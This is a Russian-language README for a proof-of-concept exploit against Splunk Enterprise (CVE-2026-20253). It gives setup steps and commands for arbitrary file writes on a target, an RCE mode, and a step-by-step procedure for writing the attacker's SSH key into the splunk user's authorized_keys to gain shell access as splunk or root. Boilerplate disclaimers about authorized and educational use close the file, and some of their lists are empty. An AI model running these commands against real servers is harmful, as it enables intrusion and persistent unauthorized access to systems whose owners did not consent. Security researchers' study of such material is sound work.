
CVE-2026-20253 - Splunk Enterprise
Используйте этот проект только в безопасных и авторизованных средах, таких как:
Пример настройки:
git clone https://github.com/HORKimhab/CVE-2026-20253
cd CVE-2026-20253
# Проект использует Python, действуйте следующим образом
# Создайте виртуальное окружение
python -m venv venv
# Активируйте виртуальное окружение
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Установите зависимости
pip install -r requirements.txt
Пример использования:
# Базовая проверка
python3 cve-2026-20253.py -t http://target:8000 --check
# Запись пустого/усечённого файла
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/pwned"
# Запись с содержимым из файла
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/shell.py" --content poc-content.txt
# Расширенный режим (восстановление + содержимое)
python3 cve-2026-20253.py -t http://target:8000 --write "/opt/splunk/etc/apps/.../payload.py" --content poc-content.txt --restore
# Попытка удалённого выполнения команд (RCE)
python3 cve-2026-20253.py -t http://target:8000 --rce
python3 cve-2026-20253_poc.py -t http://target:8000 \
--write "/path/to/target/file.py" \
--content poc-content.txt --restore
# SSH
# Создайте пару SSH-ключей (если у вас её нет)
ssh-keygen -t ed25519 -C "poc@attacker" -f ~/.ssh/splunk_poc_key -N ""
# Или используйте RSA, если целевая система старая
# ssh-keygen -t rsa -b 4096 -f ~/.ssh/splunk_poc_key -N ""
cat ~/.ssh/splunk_poc_key.pub > poc-content.txt
python3 cve-2026-20253_poc.py -t http://target:8000 \
--write "/home/splunk/.ssh/authorized_keys" \
--content poc-content.txt \
--restore
python3 cve-2026-20253_poc.py -t http://target:8000 \
--write "/home/splunk/.ssh/authorized_keys" \
--content poc-content.txt
# Убедитесь, что права доступа настроены правильно на вашей стороне
chmod 600 ~/.ssh/splunk_poc_key
# Подключение
ssh -i ~/.ssh/splunk_poc_key splunk@target_ip
# Или от root
ssh -i ~/.ssh/splunk_poc_key root@target_ip
# Шаг 1: Создание каталога (может сработать не всегда)
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/.placeholder"
# Шаг 2: Запись authorized_keys
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/authorized_keys" --content poc-content.txt
mkdir -p /home/splunk/.ssh
chmod 700 /home/splunk/.ssh
chmod 600 /home/splunk/.ssh/authorized_keys
chown -R splunk:splunk /home/splunk/.ssh
Репозиторий для изучения, тестирования и исследования концепций кибербезопасности в контролируемых средах.
Этот репозиторий предназначен исключительно для образовательных и авторизованных исследований в области безопасности.
Он создан, чтобы помочь пользователям изучить:
Используйте этот репозиторий только в средах, где у вас есть разрешение, например:
Несанкционированное или незаконное использование строго запрещено.
Автор и соавторы не несут ответственности за любой ущерб, неправомерное использование, юридические проблемы или убытки, вызванные этим проектом.
Используя этот репозиторий, вы соглашаетесь с тем, что:
Этот проект предназначен для:
Пожалуйста, следуйте практикам ответственного раскрытия информации и соблюдайте все применимые законы.
Для ответственного раскрытия информации или сотрудничества свяжитесь с мейнтейнером репозитория через GitHub.